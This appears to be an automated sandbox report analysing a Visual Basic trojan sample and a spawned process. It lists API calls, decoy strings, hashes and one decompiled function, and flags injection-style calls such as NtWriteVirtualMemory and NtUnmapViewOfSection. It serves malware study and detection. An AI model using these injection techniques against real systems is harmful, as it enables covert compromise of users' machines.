Function 00414A70, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 211COMMON

Download Yara Rule

APIs

__vbaLenBstr.MSVBVM60(004035AC), ref: 00414AB5
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414AD6
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414B01
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000068), ref: 00414B29
__vbaFreeObj.MSVBVM60 ref: 00414B34
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414B49
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414B6E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,000000F8), ref: 00414B94
__vbaStrMove.MSVBVM60 ref: 00414BA9
__vbaFreeObj.MSVBVM60 ref: 00414BAE
__vbaVarDup.MSVBVM60 ref: 00414BC4
#529.MSVBVM60(?), ref: 00414BCE
__vbaFreeVar.MSVBVM60 ref: 00414BD7
__vbaStrCat.MSVBVM60(004035DC,004035D0,00000002), ref: 00414BF9
__vbaStrMove.MSVBVM60 ref: 00414C04
__vbaInStr.MSVBVM60(00000000,004035DC,00000000), ref: 00414C0D
__vbaFreeStr.MSVBVM60 ref: 00414C23
#612.MSVBVM60(?), ref: 00414C36
__vbaStrVarMove.MSVBVM60(?), ref: 00414C40
__vbaStrMove.MSVBVM60 ref: 00414C4B
__vbaFreeVar.MSVBVM60 ref: 00414C56
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414C6B
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414C90
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000078), ref: 00414CB0
__vbaFreeObj.MSVBVM60 ref: 00414CB5
__vbaVarDup.MSVBVM60 ref: 00414CCF
#600.MSVBVM60(?,00000002), ref: 00414CDB
__vbaFreeVar.MSVBVM60 ref: 00414CE6
__vbaFreeStr.MSVBVM60(00414D1D), ref: 00414D15
__vbaFreeStr.MSVBVM60 ref: 00414D1A

Strings

brunmaskets, xrefs: 00414BB6
Chibouks, xrefs: 00414CC1

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#529#600#612Bstr
String ID: Chibouks$brunmaskets
API String ID: 1473600650-548072504
Opcode ID: 096cf8842a34481b2fd97c93f09a07ef24bd5b66f90c2b257d39461f2a203fdb
Instruction ID: 5cc56dbb954f8bff71fa6cf5b222a9560096b89650d20d5aec3d0234085a798f
Opcode Fuzzy Hash: 096cf8842a34481b2fd97c93f09a07ef24bd5b66f90c2b257d39461f2a203fdb
Instruction Fuzzy Hash: 07715171900219AFCB14DFA5DD88EDEBBB8FF48705F10442AE501B72A0DB78A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00417E00, Relevance: 51.0, APIs: 26, Strings: 3, Instructions: 216COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00417E64
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00417E89
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000058), ref: 00417EAD
__vbaStrMove.MSVBVM60 ref: 00417EC2
__vbaFreeObj.MSVBVM60 ref: 00417EC7
__vbaStrCat.MSVBVM60(00403738,00403730), ref: 00417EDD
__vbaStrMove.MSVBVM60 ref: 00417EE4
#713.MSVBVM60(00000000), ref: 00417EE7
__vbaStrMove.MSVBVM60 ref: 00417EF2
__vbaStrCat.MSVBVM60(00403730,00403738,00000000), ref: 00417EFF
__vbaStrMove.MSVBVM60 ref: 00417F06
__vbaStrCmp.MSVBVM60(00000000), ref: 00417F09
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00417F27
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00417F4B
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00417F70
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,0000013C), ref: 00417FC1
__vbaFreeObj.MSVBVM60 ref: 00417FD4
#593.MSVBVM60(?), ref: 00417FE8
__vbaFreeVar.MSVBVM60 ref: 00417FF3
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041800C
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,0000004C), ref: 00418031
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040334C,00000024), ref: 0041805B
__vbaStrMove.MSVBVM60 ref: 0041806A
__vbaFreeObj.MSVBVM60 ref: 00418073
__vbaFreeStr.MSVBVM60(004180BF), ref: 004180B7
__vbaFreeStr.MSVBVM60 ref: 004180BC

Strings

nonprobatory, xrefs: 00418041
MULTIPLICEREDE, xrefs: 0041803C
Eskimologi, xrefs: 00417F98

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#593#713List
String ID: Eskimologi$MULTIPLICEREDE$nonprobatory
API String ID: 3991002266-1938823226
Opcode ID: 8177d5e2e89de9061708dd297e2154f5ade392efbe9d6043a1326b048da6290f
Instruction ID: 0fdbee4517bd808f71c79f58c3403bbdd755a8fc6cf969886f0eb5b8d8ca399e
Opcode Fuzzy Hash: 8177d5e2e89de9061708dd297e2154f5ade392efbe9d6043a1326b048da6290f
Instruction Fuzzy Hash: C18152B1901219ABCB14EF95DD89EDEBFB8FF48700F20842AE505B72A0D7746945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00415390, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 200COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,004036B8,00000008), ref: 004153F6
#647.MSVBVM60(?,?), ref: 00415413
__vbaVarTstEq.MSVBVM60(?,?), ref: 00415438
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041544B
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 0041546F
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00415494
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,000000E0), ref: 004154BE
__vbaStrMove.MSVBVM60 ref: 004154CD
__vbaFreeObj.MSVBVM60 ref: 004154D6
#680.MSVBVM60(00000000,3FF00000,00000000,3FF00000,00000000,40490000,?,?,?), ref: 00415511
__vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00415527
__vbaHresultCheckObj.MSVBVM60(00000000,?,004025E4,00000084), ref: 0041556D
__vbaStrCat.MSVBVM60(004036A8,004036A8), ref: 0041557D
__vbaStrMove.MSVBVM60 ref: 00415588
#530.MSVBVM60(00000000), ref: 0041558F
__vbaFreeStr.MSVBVM60 ref: 00415598
#708.MSVBVM60(?,?,004036B0,000000FF,00000000), ref: 004155D0
__vbaAryVar.MSVBVM60(00002008,?), ref: 004155DF
__vbaAryCopy.MSVBVM60(?,?), ref: 004155F6
__vbaFreeVar.MSVBVM60 ref: 004155FF
__vbaFreeStr.MSVBVM60(00415671), ref: 00415648
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041565B
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041566E

Strings

Beckhams1, xrefs: 00415424

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$DestructListMove$#530#647#680#708Construct2CopyNew2
String ID: Beckhams1
API String ID: 1956804484-1762715271
Opcode ID: e6d06848489b7b52a3ef022a6f5ec6b5d6787276c1c90962d63f4571016a4118
Instruction ID: c6b24150f6ebca871e5798f5dc2b1c5fbce5c93954b2081f31ec7e76b847a0f5
Opcode Fuzzy Hash: e6d06848489b7b52a3ef022a6f5ec6b5d6787276c1c90962d63f4571016a4118
Instruction Fuzzy Hash: 428138B1C00219EBDB10DF94DD48BDEBBB8FB48701F10856AE519B72A4D7741686CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414D40, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 153COMMON

Download Yara Rule

APIs

#598.MSVBVM60 ref: 00414D89
#670.MSVBVM60(?), ref: 00414D93
__vbaVarTstEq.MSVBVM60(?,?), ref: 00414DAF
__vbaFreeVar.MSVBVM60 ref: 00414DBB
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414DDC
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414E07
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000058), ref: 00414E2F
__vbaStrMove.MSVBVM60 ref: 00414E3A
__vbaFreeObj.MSVBVM60 ref: 00414E49
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414E5E
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414E83
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000138), ref: 00414EAC
__vbaFreeObj.MSVBVM60 ref: 00414EB1
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414EC6
__vbaObjSetAddref.MSVBVM60(?,00401270), ref: 00414EDC
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000010), ref: 00414EF6
__vbaFreeObj.MSVBVM60 ref: 00414EFB
__vbaFreeStr.MSVBVM60(00414F38), ref: 00414F31

Strings

Fewter, xrefs: 00414E8C
Bradypus, xrefs: 00414DA1

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$#598#670AddrefMove
String ID: Bradypus$Fewter
API String ID: 4216636924-501467344
Opcode ID: d876f269aadceff5d5ec7fd14710bedb2301027abbf2c7e2bd2780ad1f330a2f
Instruction ID: ce27855ce8ccdda0285439c7519c76966482a5f33b355f88f065b3cb9f8716a9
Opcode Fuzzy Hash: d876f269aadceff5d5ec7fd14710bedb2301027abbf2c7e2bd2780ad1f330a2f
Instruction Fuzzy Hash: 72515D70900219AFCF10AFA5CD88EDEBBB8BF48704F10442AF945B72A0D7789945CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004180F0, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00418142
__vbaR8Str.MSVBVM60(004037A0), ref: 0041814D
__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00418176
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 0041819B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,00000058), ref: 004181BF
__vbaStrMove.MSVBVM60 ref: 004181D4
__vbaFreeObj.MSVBVM60 ref: 004181D9
#536.MSVBVM60(?), ref: 004181EE
__vbaStrMove.MSVBVM60 ref: 004181F9
__vbaFreeVar.MSVBVM60 ref: 00418204
#716.MSVBVM60(?,NONDEROGATIVE,00000000), ref: 00418210
__vbaLateIdSt.MSVBVM60(?,00000000), ref: 00418237
__vbaFreeVar.MSVBVM60 ref: 00418240
__vbaFreeObj.MSVBVM60(00418285), ref: 00418269
__vbaFreeStr.MSVBVM60 ref: 00418278
__vbaFreeStr.MSVBVM60 ref: 0041827D
__vbaFreeStr.MSVBVM60 ref: 00418282

Strings

NONDEROGATIVE, xrefs: 00418207

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultMove$#536#716CopyLateNew2
String ID: NONDEROGATIVE
API String ID: 882445697-2390752018
Opcode ID: cab13b08e2650fe995260a972c0b1d19f6762a502f0e493697f13a8d64e75250
Instruction ID: 505bfb588431acf0bba3c64ba3bdca5b1adab4815f767f2158606437dee20239
Opcode Fuzzy Hash: cab13b08e2650fe995260a972c0b1d19f6762a502f0e493697f13a8d64e75250
Instruction Fuzzy Hash: 42411BB5D00209AFCB04DFA5DD889DEBBB8FF58710F10816AE911B72A0DB786945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00414F60, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E00414F60(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr* _t20;
				void* _t23;
				intOrPtr* _t24;
				void* _t25;
				intOrPtr* _t27;
				intOrPtr* _t39;
				intOrPtr* _t40;
				void* _t41;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				_t45 = _t44 - 0x30;
				_v16 = _t45;
				_v12 = 0x401280;
				_v8 = 0;
				_t20 = _a4;
				 *((intOrPtr*)( *_t20 + 4))(_t20, __edi, __esi, __ebx,  *[fs:0x0], 0x401316, _t41);
				_t47 =  *0x4193cc; // 0x4ced94
				_v28 = 0;
				_v32 = 0;
				if(_t47 == 0) {
					__imp____vbaNew2(0x402bcc, 0x4193cc);
				}
				_t39 =  *0x4193cc; // 0x4ced94
				_t23 =  *((intOrPtr*)( *_t39 + 0x14))(_t39,  &_v32);
				asm("fclex");
				if(_t23 < 0) {
					__imp____vbaHresultCheckObj(_t23, _t39, 0x402bbc, 0x14);
				}
				_t24 = _v32;
				_t27 = _t45 - 0x10;
				 *_t27 = 0xa;
				 *((intOrPtr*)(_t27 + 4)) = _v44;
				 *((intOrPtr*)(_t27 + 8)) = 0x80020004;
				_t40 = _t24;
				 *((intOrPtr*)(_t27 + 0xc)) = _v36;
				_t25 =  *((intOrPtr*)( *_t24 + 0x13c))(_t24, L"UNDGAAS");
				asm("fclex");
				if(_t25 < 0) {
					__imp____vbaHresultCheckObj(_t25, _t40, 0x402c00, 0x13c);
				}
				__imp____vbaFreeObj();
				_v28 = 0x45a052;
				_push(0x415047);
				return _t25;
			}

0x00414f63
0x00414f72
0x00414f79
0x00414f7f
0x00414f82
0x00414f8b
0x00414f8e
0x00414f94
0x00414f97
0x00414f9d
0x00414fa0
0x00414fa3
0x00414faf
0x00414faf
0x00414fb5
0x00414fc2
0x00414fc5
0x00414fc9
0x00414fd4
0x00414fd4
0x00414fda
0x00414fe2
0x00414fe9
0x00414fee
0x00414ff6
0x00415002
0x00415004
0x00415007
0x0041500d
0x00415011
0x0041501f
0x0041501f
0x00415028
0x0041502e
0x00415035
0x00000000

APIs

__vbaNew2.MSVBVM60(00402BCC,004193CC), ref: 00414FAF
__vbaHresultCheckObj.MSVBVM60(00000000,004CED94,00402BBC,00000014), ref: 00414FD4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402C00,0000013C), ref: 0041501F
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00415028

Strings

UNDGAAS, xrefs: 00414FFC

Memory Dump Source

Source File: 00000000.00000002.384052428.000000000040F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384043286.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.384046182.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.384058550.0000000000419000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.384061860.000000000041B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$FreeNew2
String ID: UNDGAAS
API String ID: 4261391273-406549890
Opcode ID: b33a5323a997c70d6b230dd393f00588c97cac7f3ce4db8099c1d2858b0180ea
Instruction ID: 43526ecb3a62599a47d14a6372a54d2c029ea19992ca1044d40eb22b59950728
Opcode Fuzzy Hash: b33a5323a997c70d6b230dd393f00588c97cac7f3ce4db8099c1d2858b0180ea
Instruction Fuzzy Hash: 6B216070900605EBCB00DF95C989A9ABFF8FF48700F20846BE805B72A1D3789945CF98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe PID: 7080 Parent PID: 6696 SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCOMMON

Executed Functions

Function 00569D2C, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(74F77677,-805E08C4), ref: 00569DD9

Memory Dump Source

Source File: 00000004.00000002.462101506.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 9430fcabc6ec78cf5574c355bb4b0386722fea204e8dfaa0a0f4952e0611024a
Instruction ID: 275e6e5ec4833a03ad2872a8e751186de8708560ff2c9cda58749c85d2940f5c
Opcode Fuzzy Hash: 9430fcabc6ec78cf5574c355bb4b0386722fea204e8dfaa0a0f4952e0611024a
Instruction Fuzzy Hash: DBF067B8604386CFCB385E78DCE53ABBBB4AF19340F91062BC995CB11AC33009809A03

Uniqueness

Uniqueness Score: -1.00%

Function 00569D4C, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(74F77677,-805E08C4), ref: 00569DD9

Memory Dump Source

Source File: 00000004.00000002.462101506.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 0f6c4194d1ab838d5590628f20966890e2a32a53486baa0aca9b40a5568a2c41
Instruction ID: b67b65f37bc87b887d6570c4609bc3472afa9e27909332d7f53dd78b55879079
Opcode Fuzzy Hash: 0f6c4194d1ab838d5590628f20966890e2a32a53486baa0aca9b40a5568a2c41
Instruction Fuzzy Hash: 93F06DB9601786CBCB349E78CCD27ABBBB5BF58300F91011AD885C3115D33459859A03

Uniqueness

Uniqueness Score: -1.00%

Function 00569D9F, Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(74F77677,-805E08C4), ref: 00569DD9

Memory Dump Source

Source File: 00000004.00000002.462101506.0000000000569000.00000040.00000001.sdmp, Offset: 00569000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: dfa2d78f2e583d6acb6085f7898437d8f71454b8d05517676912d019f04ac03e
Instruction ID: e58917a7108ba386362f2c374facc80284ca4070b72c977701d98269430305e9
Opcode Fuzzy Hash: dfa2d78f2e583d6acb6085f7898437d8f71454b8d05517676912d019f04ac03e
Instruction Fuzzy Hash: 7AF06734206284CFCB60EF6CC896A8ABBB0AF06345F110299C581CB161C3259C96CF46

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: win.exe PID: 5128 Parent PID: 6884 win.exeCOMMON

Executed Functions

Function 020B3E30, Relevance: 7.8, APIs: 1, Strings: 3, Instructions: 815COMMON

Download Yara Rule

Strings

UY, xrefs: 020B4D4C
dGi, xrefs: 020B4EF2
Xkiu, xrefs: 020B4D7C

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: UY$Xkiu$dGi
API String ID: 0-2109732242
Opcode ID: ededf9df30c3a1f0f186e4e8761b987e311b55926b68bb0a179f80bf46d9913f
Instruction ID: be9bce52e1cc302b8748ffe557e459f1334d89d721f927ec5ffe2bda44dd83bc
Opcode Fuzzy Hash: ededf9df30c3a1f0f186e4e8761b987e311b55926b68bb0a179f80bf46d9913f
Instruction Fuzzy Hash: BA62517260434A9FDB758E24CD907EEBBB2FF95350F55822EDC8A9B250D3314A81DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4638, Relevance: 7.7, APIs: 1, Strings: 3, Instructions: 691nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 020B7CAD: LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

UY, xrefs: 020B4D4C
dGi, xrefs: 020B4EF2
Xkiu, xrefs: 020B4D7C

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3569954152-2109732242
Opcode ID: e2d41190748602d0927b7aad7819435508b84fbf5e660171beebdb7d06dabcbd
Instruction ID: a373ba9a431dd67335fd9ab98389e4105be273574b3688d7feb9089d7b2a1347
Opcode Fuzzy Hash: e2d41190748602d0927b7aad7819435508b84fbf5e660171beebdb7d06dabcbd
Instruction Fuzzy Hash: EE42427260434A9FDB758E24CD907EEBBB2FF95350F55822EDC899B210D3758A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B4A27, Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 500nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

UY, xrefs: 020B4D4C
dGi, xrefs: 020B4EF2
Xkiu, xrefs: 020B4D7C

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: UY$Xkiu$dGi
API String ID: 3527976591-2109732242
Opcode ID: 1f662f8ca0a3e88dbf30944986933d94088f1a16510f23aa427eaf97f260054d
Instruction ID: e333a094dec4ea547d8dd319d230266541eb5127fe116bf4084738a26b4d0937
Opcode Fuzzy Hash: 1f662f8ca0a3e88dbf30944986933d94088f1a16510f23aa427eaf97f260054d
Instruction Fuzzy Hash: 9512437260434A9FEB758F24CD907EE7BB2FF56390F518229DC899B250D3758A81CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020B4E36, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 310nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4

Strings

dGi, xrefs: 020B4EF2

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: dGi
API String ID: 3527976591-4201200356
Opcode ID: 0862be77a20c944499bab0012035be49f483f568b5b478d3ac47e113bd94c852
Instruction ID: 5fb498e7206c0c485ee0a5ae92f68f5a221bc3c519fbf45c3984779cc26de62d
Opcode Fuzzy Hash: 0862be77a20c944499bab0012035be49f483f568b5b478d3ac47e113bd94c852
Instruction Fuzzy Hash: 5FC131326043499FEB768E24CD807EE3BB2FF56350F51416DED899B260C3758985DB42

Uniqueness

Uniqueness Score: -1.00%

Function 020B1204, Relevance: 1.7, APIs: 1, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0152ae86f41f12f0fe6508227cf699d7ba84f450eeaa393a1ae1d09ed1ab8492
Instruction ID: 9b3b961176c5bbe5db3977886fb633c4bb1c72f63025481e024965ace8cc8a45
Opcode Fuzzy Hash: 0152ae86f41f12f0fe6508227cf699d7ba84f450eeaa393a1ae1d09ed1ab8492
Instruction Fuzzy Hash: 11718D70504386ABDF339E288C983EEBBE6AF4A350F94812ECC89D7655C3354985DB53

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A03, Relevance: 1.6, APIs: 1, Instructions: 142librarynativeCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60
NtUnmapViewOfSection.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadSectionUnmapView
String ID:
API String ID: 4218206477-0
Opcode ID: 0d7a901e7ecf5d48def5a135b407ee5199e6486dac7c8ced34e9102d2c21c442
Instruction ID: 13ec10eb98ed22df0a43a4d6ded11b6c74c3096064a7a15fe8e2698341f23948
Opcode Fuzzy Hash: 0d7a901e7ecf5d48def5a135b407ee5199e6486dac7c8ced34e9102d2c21c442
Instruction Fuzzy Hash: B5411531600308CFEB779E78CA907EA72A2AF96315F56852ADE0287119D339C481EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B9A2F, Relevance: 1.6, APIs: 1, Instructions: 134nativeCOMMON

Download Yara Rule

APIs

NtUnmapViewOfSection.NTDLL ref: 020B9C5F

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 4edb32d06bd1d2b926732057f69c42ddc680e86d8783ad45cc9b8eae46d4db00
Instruction ID: 65ae2f144e831e7e0e5092720b390200c48f5b15a33b53c3de241f437922cc23
Opcode Fuzzy Hash: 4edb32d06bd1d2b926732057f69c42ddc680e86d8783ad45cc9b8eae46d4db00
Instruction Fuzzy Hash: 1341063160130CCFEB778E34C6947FE76A2AF82315F56852ACE4287119D379C581EE85

Uniqueness

Uniqueness Score: -1.00%

Function 020B5230, Relevance: 1.6, APIs: 1, Instructions: 111librarynativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,AEB81288,?,00000000,?,?,?), ref: 020B52D4
LoadLibraryA.KERNELBASE(?,1D6298E9,?,020B0981,00000000), ref: 020B7D60

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryVirtualWrite
String ID:
API String ID: 3569954152-0
Opcode ID: 9de9f421b056fed892a1a6414115544300a7a890c46f6bf793ee1a8a629f9296
Instruction ID: c32c6ae70ef0c6d8f0606fa281207bc7d9634600edfc368a120d2599d863a9f7
Opcode Fuzzy Hash: 9de9f421b056fed892a1a6414115544300a7a890c46f6bf793ee1a8a629f9296
Instruction Fuzzy Hash: C34103712043099FDB7A5F24CD80BED7BA3FF86354F544228ED899B2A0D7328981EB01

Uniqueness

Uniqueness Score: -1.00%

Function 020B5A05, Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b61e1d69dbb4db4bb78ac46341db68d1d1a855032d4ba2f4222b54b3753f1be2
Instruction ID: 6595c401b0a119ed91d9a5c873c421886001edfec4d9be7c5a7a370458187927
Opcode Fuzzy Hash: b61e1d69dbb4db4bb78ac46341db68d1d1a855032d4ba2f4222b54b3753f1be2
Instruction Fuzzy Hash: 5401ED31609304CFE720EE7988C66EABBB2EF26350F91806C99C683415E7616884CB22

Uniqueness

Uniqueness Score: -1.00%

Function 020B5A4F, Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 020B5AF6

Memory Dump Source

Source File: 00000010.00000002.613714696.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e3d84456cc3d57531de25a5ee74366b69ca478ebf9c40b6d781c52849d10824b
Instruction ID: dbe8472f1e4860d65bb41d4539cf84d1e6d830891e83246360e19abb75b51553
Opcode Fuzzy Hash: e3d84456cc3d57531de25a5ee74366b69ca478ebf9c40b6d781c52849d10824b
